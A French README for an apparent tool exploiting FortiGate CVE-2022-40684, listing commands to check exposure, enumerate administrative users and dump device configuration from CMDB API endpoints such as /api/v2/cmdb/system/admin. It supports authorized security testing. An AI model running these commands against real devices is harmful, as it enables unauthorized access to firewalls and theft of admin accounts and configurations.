
Outil d'évaluation FortiGate CVE-2022-40684 pour l'énumération d'utilisateurs, l'extraction de configuration et les tests en laboratoire.
Cet outil permet aux professionnels de la sécurité d'identifier et de valider l'exposition à CVE-2022-40684 sur les appareils FortiGate en interagissant avec les points de terminaison de l'API CMDB exposés.
Il prend en charge l'énumération des utilisateurs administratifs, des groupes d'utilisateurs et l'extraction sélective de configuration pour analyse dans des environnements contrôlés.
Installer les dépendances : pip3 install -r requirements.txt
Vérifier la vulnérabilité :
python3 fortigate_tool.py -t <target>
Énumérer les utilisateurs :
python3 fortigate_tool.py -t <target> --enum
Extraire un point de terminaison spécifique :
python3 fortigate_tool.py -t <target> --dump /api/v2/cmdb/system/admin
Extraire plusieurs configurations importantes :
python3 fortigate_tool.py -t <target> --dump-all
Les configurations extraites sont stockées localement dans : fortigate_dump/
Cet outil est destiné uniquement à des fins éducatives et à des tests de sécurité autorisés. N'utilisez pas cet outil sur des systèmes sans autorisation explicite. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil.